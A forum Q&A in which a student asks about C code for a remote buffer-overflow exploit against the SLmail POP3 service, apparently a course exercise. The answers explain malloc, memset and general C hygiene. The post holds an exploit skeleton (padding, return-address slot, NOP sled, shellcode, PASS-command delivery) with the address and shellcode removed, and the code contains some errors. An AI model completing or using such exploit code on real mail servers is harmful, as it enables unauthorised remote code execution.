# Using SLmail 643 and understanding how I can use it

Tags: c, exploit

I am taking a class and it requires me to manipulate this c code to work for my specific circumstances. I understand most of it however am having some trouble understanding what several c specific variables are being used for bellow. Note I have removed portions of the code however have kept the area in question in tact.

Also I am not asking you to do my homework, I just need some help in understanding some areas so I can do it my self..a helpful nudge, or a violent push.

```
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>


#define retadd "\x\x\x\x" */I removed the memory return*/
#define port 110

char buf[] = "Stuff will be put here"

struct sockaddr_in plm,lar,target;



int conn(char *ip)
{
int sockfd;
plm.sin_family = AF_INET;
plm.sin_port = htons(port);
plm.sin_addr.s_addr = inet_addr(ip);
bzero(&(plm.sin_zero),8);
sockfd = socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr *)&plm,sizeof(struct sockaddr))) < 0)
{
 perror("[-] connect error!");
 exit(0);
 }
 printf("[*] Connected to: %s.\n",ip);
 return sockfd;
}

int main(int argc, char *argv[])

{

int xs;



char out[1024];

char *buffer = malloc(2958);

memset(buffer, 0x00, 2958);



char *off = malloc(2606);

memset(off, 0x00, 2606);

memset(off, 0x41, 2605);



char *nop = malloc(16);

memset(nop, 0x00, 8);

memset(nop, 0x90, 16);



strcat(buffer, off);

strcat(buffer, retadd);

strcat(buffer, nop);

strcat(buffer, shellcode);



printf("[+] SLMAIL Connection \n");

xs = conn("192.168.31.29");

read(xs, out, 1024);

printf("[*] %s", out);

write(xs,"USER username\r\n", 15);

read(xs, out, 1024);

printf("[*] %s", out);

write(xs,"PASS ",5);

write(xs,buffer,strlen(buffer));

printf("insert len: %d bytes\n",strlen(insert));

printf("Buffer len: %d bytes\n",strlen(buffer));

write(xs,"\r\n",4);

close(xs);  

}
```

What is the malloc(2958) setting? Is this the total size allotment for the buffer?
Also what is the memset variable for in c?

```
char *buffer = malloc(2958);

memset(buffer, 0x00, 2958);
```

Under the malloc(2606) this is the byte size required to register a specific point in memory, why is it lessened by 1 bellow for the hex 'A's 2605?

```
char *off = malloc(2606);

memset(off, 0x00, 2606);

memset(off, 0x41, 2605);
```

Once again I under stand this will add 7 x90s to the buffer, but what is the significance of malloc and the 0x00 here?

```
char *nop = malloc(8);

memset(nop, 0x00, 8);

memset(nop, 0x90, 7);
```

Thank you.

Answer (score 0):

A quick look at the man pages would show you that `malloc` reserves the number of bytes of memory stated in the argument and returns a pointer to that memory, and `memset` fills a range of memory with the (byte) value passed.

```
char *nop = malloc(8);      // allocate 8 bytes of memory
memset(nop, 0x00, 8);       // fill those 8 bytes with 0x00
memset(nop, 0x90, 7);       // fill the first 7 bytes with 0x70
```

One reason for this *could be* first a routine initialisation, and a second initialisation to make a nul-terminated string. Note that `malloc` does not initialise memory, the memory allocated is in an undefined state.

I don't see it though - `calloc` does the same as `malloc` but also fills the allocated memory with `0`.

Whether you use `malloc` or `calloc` or even `realloc` you should get into the habit of always checking the result.

```
char *nop = malloc(8);
if (nop == NULL) {  ... /* failure code */ }
```

Another small point, the first of the four consecutive `strcat(buffer,...)` statements only works because the buffer was initialised. It's bad practise: the first `strcat` would be better as `strcpy`.

While I am here this (which requires a terminating `;` to compile)

```
char buf[] = "Stuff will be put here"
```

will only hold the number of bytes reserved by the length of your message: 22 as it stands.

Finally, those `char*` buffers you allocated memory for in `main()` - the memory should be released at the end of the program by calling

```
free(buffer);
free(nop);
```

etc.

Comment: From an exploit perspective does it matter that 0x00 in some cases could be considered a badchar and might cause the application to stop- or does that not matter since we are compiling it? It looks like the 0x00 Null is simply being overwritten and not relevant. Do you have to use nulls to clear the space or is this a good programming practice?

Comment: I don't know what the programmer intended. `0` or `0x00` or `NULL` isn't a "bad char". They are just different ways of expressing the same thing (provided `NULL` is `0`, which it is not guaranteed to be). I was just commenting on what you asked. But seeing as it's a school question, sometimes the code they give you has to be improved! NB your narrative about `nop` which I quoted in my answer doesn't match the code `char *nop = malloc(16); memset(nop, 0x00, 8); memset(nop, 0x90, 16);` Why zero 8 of the 16 bytes and then set all 16?